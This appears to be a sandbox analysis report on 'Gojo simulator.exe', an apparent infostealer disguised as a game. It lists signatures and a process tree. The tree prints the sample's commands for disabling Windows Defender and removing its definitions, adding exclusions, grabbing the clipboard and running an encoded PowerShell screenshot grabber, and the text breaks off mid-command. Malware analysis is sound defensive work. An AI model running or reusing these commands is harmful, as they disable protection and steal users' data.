Analysis
-
max time kernel
104s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
14/04/2025, 23:27
Behavioral task
behavioral1
Sample
dist/Gojo simulator.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral2
Sample
dist/mapper/map.exe
Resource
win10v2004-20250314-en
General
-
Target
dist/Gojo simulator.exe
-
Size
7.8MB
-
MD5
af5dd5e0736e272360fd2808eb1e570b
-
SHA1
a67924548f53e09ce4d1e4906a0a12e3cd4b1839
-
SHA256
bf89680b50b1fa2be445ffc674826d3445c98761a4c65a081e4eb5938eab1736
-
SHA512
02a6f7ad4cf9cb196b9246d2fb9c94a46b9163a71fff31f8b5dee12bd58cd6aa7175ec37d71a1ce8fa320af222af86e4f236ed44b3c29989d58c4a5ffa8aed57
-
SSDEEP
196608:mW1CHUOXXKApOgj9fZwQRCgiIKpdzjPOan7j2y283TOnOh:YxMUw8wIKppDO9ih
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4824 powershell.exe 3688 powershell.exe 4504 powershell.exe 5580 powershell.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 3268 cmd.exe 5420 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2212 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 1920 Gojo simulator.exe 1920 Gojo simulator.exe 1920 Gojo simulator.exe 1920 Gojo simulator.exe 1920 Gojo simulator.exe 1920 Gojo simulator.exe 1920 Gojo simulator.exe 1920 Gojo simulator.exe 1920 Gojo simulator.exe 1920 Gojo simulator.exe 1920 Gojo simulator.exe 1920 Gojo simulator.exe 1920 Gojo simulator.exe 1920 Gojo simulator.exe 1920 Gojo simulator.exe 1920 Gojo simulator.exe 1920 Gojo simulator.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 19 discord.com 20 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 17 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid Process 4872 tasklist.exe 3104 tasklist.exe 772 tasklist.exe -
resource yara_rule behavioral1/files/0x000700000002426a-21.dat upx behavioral1/memory/1920-25-0x00007FF916220000-0x00007FF916887000-memory.dmp upx behavioral1/files/0x000700000002425d-27.dat upx behavioral1/files/0x0007000000024268-29.dat upx behavioral1/memory/1920-48-0x00007FF92EA60000-0x00007FF92EA6F000-memory.dmp upx behavioral1/files/0x0007000000024264-47.dat upx behavioral1/files/0x0007000000024263-46.dat upx behavioral1/files/0x0007000000024262-45.dat upx behavioral1/files/0x0007000000024261-44.dat upx behavioral1/files/0x0007000000024260-43.dat upx behavioral1/files/0x000700000002425f-42.dat upx behavioral1/files/0x000700000002425e-41.dat upx behavioral1/files/0x000700000002425c-40.dat upx behavioral1/files/0x000700000002426f-39.dat upx behavioral1/files/0x000700000002426e-38.dat upx behavioral1/files/0x000700000002426d-37.dat upx behavioral1/files/0x0007000000024269-34.dat upx behavioral1/files/0x0007000000024267-33.dat upx behavioral1/memory/1920-30-0x00007FF929D00000-0x00007FF929D27000-memory.dmp upx behavioral1/memory/1920-50-0x00007FF92B240000-0x00007FF92B25A000-memory.dmp upx behavioral1/memory/1920-52-0x00007FF925930000-0x00007FF92595B000-memory.dmp upx behavioral1/memory/1920-58-0x00007FF925220000-0x00007FF925245000-memory.dmp upx behavioral1/memory/1920-60-0x00007FF915E40000-0x00007FF915FC9000-memory.dmp upx behavioral1/memory/1920-64-0x00007FF92CF50000-0x00007FF92CF5D000-memory.dmp upx behavioral1/memory/1920-63-0x00007FF92A1A0000-0x00007FF92A1B9000-memory.dmp upx behavioral1/memory/1920-71-0x00007FF915900000-0x00007FF915E33000-memory.dmp upx behavioral1/memory/1920-70-0x00007FF925180000-0x00007FF9251B3000-memory.dmp upx behavioral1/memory/1920-73-0x00007FF9244D0000-0x00007FF92459E000-memory.dmp upx behavioral1/memory/1920-69-0x00007FF916220000-0x00007FF916887000-memory.dmp upx behavioral1/memory/1920-78-0x00007FF928E80000-0x00007FF928E8D000-memory.dmp upx behavioral1/memory/1920-77-0x00007FF929E80000-0x00007FF929E94000-memory.dmp upx behavioral1/memory/1920-80-0x00007FF924C20000-0x00007FF924CD3000-memory.dmp upx behavioral1/memory/1920-76-0x00007FF929D00000-0x00007FF929D27000-memory.dmp upx behavioral1/memory/1920-173-0x00007FF925930000-0x00007FF92595B000-memory.dmp upx behavioral1/memory/1920-222-0x00007FF925220000-0x00007FF925245000-memory.dmp upx behavioral1/memory/1920-286-0x00007FF915E40000-0x00007FF915FC9000-memory.dmp upx behavioral1/memory/1920-314-0x00007FF925180000-0x00007FF9251B3000-memory.dmp upx behavioral1/memory/1920-315-0x00007FF915900000-0x00007FF915E33000-memory.dmp upx behavioral1/memory/1920-327-0x00007FF9244D0000-0x00007FF92459E000-memory.dmp upx behavioral1/memory/1920-335-0x00007FF915E40000-0x00007FF915FC9000-memory.dmp upx behavioral1/memory/1920-329-0x00007FF916220000-0x00007FF916887000-memory.dmp upx behavioral1/memory/1920-428-0x00007FF925180000-0x00007FF9251B3000-memory.dmp upx behavioral1/memory/1920-429-0x00007FF915900000-0x00007FF915E33000-memory.dmp upx behavioral1/memory/1920-427-0x00007FF9244D0000-0x00007FF92459E000-memory.dmp upx behavioral1/memory/1920-426-0x00007FF92A1A0000-0x00007FF92A1B9000-memory.dmp upx behavioral1/memory/1920-425-0x00007FF915E40000-0x00007FF915FC9000-memory.dmp upx behavioral1/memory/1920-424-0x00007FF925220000-0x00007FF925245000-memory.dmp upx behavioral1/memory/1920-423-0x00007FF925930000-0x00007FF92595B000-memory.dmp upx behavioral1/memory/1920-422-0x00007FF92B240000-0x00007FF92B25A000-memory.dmp upx behavioral1/memory/1920-421-0x00007FF92EA60000-0x00007FF92EA6F000-memory.dmp upx behavioral1/memory/1920-420-0x00007FF928E80000-0x00007FF928E8D000-memory.dmp upx behavioral1/memory/1920-419-0x00007FF92CF50000-0x00007FF92CF5D000-memory.dmp upx behavioral1/memory/1920-433-0x00007FF924C20000-0x00007FF924CD3000-memory.dmp upx behavioral1/memory/1920-432-0x00007FF929D00000-0x00007FF929D27000-memory.dmp upx behavioral1/memory/1920-431-0x00007FF929E80000-0x00007FF929E94000-memory.dmp upx behavioral1/memory/1920-430-0x00007FF916220000-0x00007FF916887000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2484 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 2416 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 24 IoCs
pid Process 4824 powershell.exe 3688 powershell.exe 3688 powershell.exe 4824 powershell.exe 4824 powershell.exe 3688 powershell.exe 3688 powershell.exe 5420 powershell.exe 5420 powershell.exe 5420 powershell.exe 3848 powershell.exe 3848 powershell.exe 3848 powershell.exe 4504 powershell.exe 4504 powershell.exe 4504 powershell.exe 2324 powershell.exe 2324 powershell.exe 2324 powershell.exe 5580 powershell.exe 5580 powershell.exe 5580 powershell.exe 4816 powershell.exe 4816 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4824 powershell.exe Token: SeDebugPrivilege 4872 tasklist.exe Token: SeDebugPrivilege 3688 powershell.exe Token: SeDebugPrivilege 3104 tasklist.exe Token: SeIncreaseQuotaPrivilege 2224 WMIC.exe Token: SeSecurityPrivilege 2224 WMIC.exe Token: SeTakeOwnershipPrivilege 2224 WMIC.exe Token: SeLoadDriverPrivilege 2224 WMIC.exe Token: SeSystemProfilePrivilege 2224 WMIC.exe Token: SeSystemtimePrivilege 2224 WMIC.exe Token: SeProfSingleProcessPrivilege 2224 WMIC.exe Token: SeIncBasePriorityPrivilege 2224 WMIC.exe Token: SeCreatePagefilePrivilege 2224 WMIC.exe Token: SeBackupPrivilege 2224 WMIC.exe Token: SeRestorePrivilege 2224 WMIC.exe Token: SeShutdownPrivilege 2224 WMIC.exe Token: SeDebugPrivilege 2224 WMIC.exe Token: SeSystemEnvironmentPrivilege 2224 WMIC.exe Token: SeRemoteShutdownPrivilege 2224 WMIC.exe Token: SeUndockPrivilege 2224 WMIC.exe Token: SeManageVolumePrivilege 2224 WMIC.exe Token: 33 2224 WMIC.exe Token: 34 2224 WMIC.exe Token: 35 2224 WMIC.exe Token: 36 2224 WMIC.exe Token: SeDebugPrivilege 772 tasklist.exe Token: SeDebugPrivilege 5420 powershell.exe Token: SeDebugPrivilege 3848 powershell.exe Token: SeIncreaseQuotaPrivilege 2224 WMIC.exe Token: SeSecurityPrivilege 2224 WMIC.exe Token: SeTakeOwnershipPrivilege 2224 WMIC.exe Token: SeLoadDriverPrivilege 2224 WMIC.exe Token: SeSystemProfilePrivilege 2224 WMIC.exe Token: SeSystemtimePrivilege 2224 WMIC.exe Token: SeProfSingleProcessPrivilege 2224 WMIC.exe Token: SeIncBasePriorityPrivilege 2224 WMIC.exe Token: SeCreatePagefilePrivilege 2224 WMIC.exe Token: SeBackupPrivilege 2224 WMIC.exe Token: SeRestorePrivilege 2224 WMIC.exe Token: SeShutdownPrivilege 2224 WMIC.exe Token: SeDebugPrivilege 2224 WMIC.exe Token: SeSystemEnvironmentPrivilege 2224 WMIC.exe Token: SeRemoteShutdownPrivilege 2224 WMIC.exe Token: SeUndockPrivilege 2224 WMIC.exe Token: SeManageVolumePrivilege 2224 WMIC.exe Token: 33 2224 WMIC.exe Token: 34 2224 WMIC.exe Token: 35 2224 WMIC.exe Token: 36 2224 WMIC.exe Token: SeDebugPrivilege 4504 powershell.exe Token: SeDebugPrivilege 2324 powershell.exe Token: SeIncreaseQuotaPrivilege 4784 WMIC.exe Token: SeSecurityPrivilege 4784 WMIC.exe Token: SeTakeOwnershipPrivilege 4784 WMIC.exe Token: SeLoadDriverPrivilege 4784 WMIC.exe Token: SeSystemProfilePrivilege 4784 WMIC.exe Token: SeSystemtimePrivilege 4784 WMIC.exe Token: SeProfSingleProcessPrivilege 4784 WMIC.exe Token: SeIncBasePriorityPrivilege 4784 WMIC.exe Token: SeCreatePagefilePrivilege 4784 WMIC.exe Token: SeBackupPrivilege 4784 WMIC.exe Token: SeRestorePrivilege 4784 WMIC.exe Token: SeShutdownPrivilege 4784 WMIC.exe Token: SeDebugPrivilege 4784 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3580 wrote to memory of 1920 3580 Gojo simulator.exe 87 PID 3580 wrote to memory of 1920 3580 Gojo simulator.exe 87 PID 1920 wrote to memory of 4508 1920 Gojo simulator.exe 91 PID 1920 wrote to memory of 4508 1920 Gojo simulator.exe 91 PID 1920 wrote to memory of 4488 1920 Gojo simulator.exe 92 PID 1920 wrote to memory of 4488 1920 Gojo simulator.exe 92 PID 1920 wrote to memory of 4840 1920 Gojo simulator.exe 93 PID 1920 wrote to memory of 4840 1920 Gojo simulator.exe 93 PID 4508 wrote to memory of 4824 4508 cmd.exe 97 PID 4508 wrote to memory of 4824 4508 cmd.exe 97 PID 4840 wrote to memory of 4600 4840 cmd.exe 98 PID 4840 wrote to memory of 4600 4840 cmd.exe 98 PID 1920 wrote to memory of 2012 1920 Gojo simulator.exe 99 PID 1920 wrote to memory of 2012 1920 Gojo simulator.exe 99 PID 1920 wrote to memory of 6112 1920 Gojo simulator.exe 100 PID 1920 wrote to memory of 6112 1920 Gojo simulator.exe 100 PID 4488 wrote to memory of 3688 4488 cmd.exe 103 PID 4488 wrote to memory of 3688 4488 cmd.exe 103 PID 6112 wrote to memory of 4872 6112 cmd.exe 104 PID 6112 wrote to memory of 4872 6112 cmd.exe 104 PID 2012 wrote to memory of 3104 2012 cmd.exe 105 PID 2012 wrote to memory of 3104 2012 cmd.exe 105 PID 1920 wrote to memory of 5504 1920 Gojo simulator.exe 106 PID 1920 wrote to memory of 5504 1920 Gojo simulator.exe 106 PID 1920 wrote to memory of 3268 1920 Gojo simulator.exe 107 PID 1920 wrote to memory of 3268 1920 Gojo simulator.exe 107 PID 1920 wrote to memory of 5412 1920 Gojo simulator.exe 111 PID 1920 wrote to memory of 5412 1920 Gojo simulator.exe 111 PID 1920 wrote to memory of 5520 1920 Gojo simulator.exe 112 PID 1920 wrote to memory of 5520 1920 Gojo simulator.exe 112 PID 1920 wrote to memory of 5644 1920 Gojo simulator.exe 115 PID 1920 wrote to memory of 5644 1920 Gojo simulator.exe 115 PID 1920 wrote to memory of 1212 1920 Gojo simulator.exe 116 PID 1920 wrote to memory of 1212 1920 Gojo simulator.exe 116 PID 5504 wrote to memory of 2224 5504 cmd.exe 118 PID 5504 wrote to memory of 2224 5504 cmd.exe 118 PID 5412 wrote to memory of 772 5412 cmd.exe 120 PID 5412 wrote to memory of 772 5412 cmd.exe 120 PID 3268 wrote to memory of 5420 3268 cmd.exe 121 PID 3268 wrote to memory of 5420 3268 cmd.exe 121 PID 5520 wrote to memory of 628 5520 cmd.exe 122 PID 5520 wrote to memory of 628 5520 cmd.exe 122 PID 1212 wrote to memory of 3848 1212 cmd.exe 123 PID 1212 wrote to memory of 3848 1212 cmd.exe 123 PID 5644 wrote to memory of 2416 5644 cmd.exe 124 PID 5644 wrote to memory of 2416 5644 cmd.exe 124 PID 1920 wrote to memory of 2392 1920 Gojo simulator.exe 125 PID 1920 wrote to memory of 2392 1920 Gojo simulator.exe 125 PID 2392 wrote to memory of 1808 2392 cmd.exe 127 PID 2392 wrote to memory of 1808 2392 cmd.exe 127 PID 1920 wrote to memory of 5788 1920 Gojo simulator.exe 128 PID 1920 wrote to memory of 5788 1920 Gojo simulator.exe 128 PID 5788 wrote to memory of 3828 5788 cmd.exe 130 PID 5788 wrote to memory of 3828 5788 cmd.exe 130 PID 1920 wrote to memory of 1732 1920 Gojo simulator.exe 132 PID 1920 wrote to memory of 1732 1920 Gojo simulator.exe 132 PID 3848 wrote to memory of 2348 3848 powershell.exe 131 PID 3848 wrote to memory of 2348 3848 powershell.exe 131 PID 1732 wrote to memory of 5168 1732 cmd.exe 134 PID 1732 wrote to memory of 5168 1732 cmd.exe 134 PID 1920 wrote to memory of 1864 1920 Gojo simulator.exe 135 PID 1920 wrote to memory of 1864 1920 Gojo simulator.exe 135 PID 1864 wrote to memory of 1384 1864 cmd.exe 137 PID 1864 wrote to memory of 1384 1864 cmd.exe 137
Processes
-
C:\Users\Admin\AppData\Local\Temp\dist\Gojo simulator.exe"C:\Users\Admin\AppData\Local\Temp\dist\Gojo simulator.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3580 -
C:\Users\Admin\AppData\Local\Temp\dist\Gojo simulator.exe"C:\Users\Admin\AppData\Local\Temp\dist\Gojo simulator.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dist\Gojo simulator.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4508 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dist\Gojo simulator.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:4488 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('LOADED', 0, 'Load in game', 48+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:4840 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('LOADED', 0, 'Load in game', 48+16);close()"4⤵PID:4600
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3104
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:6112 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:5504 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2224
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:3268 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5420
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:5412 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:772
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:5520 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:628
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:5644 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:2416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
- Suspicious use of WriteProcessMemory
PID:1212 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgA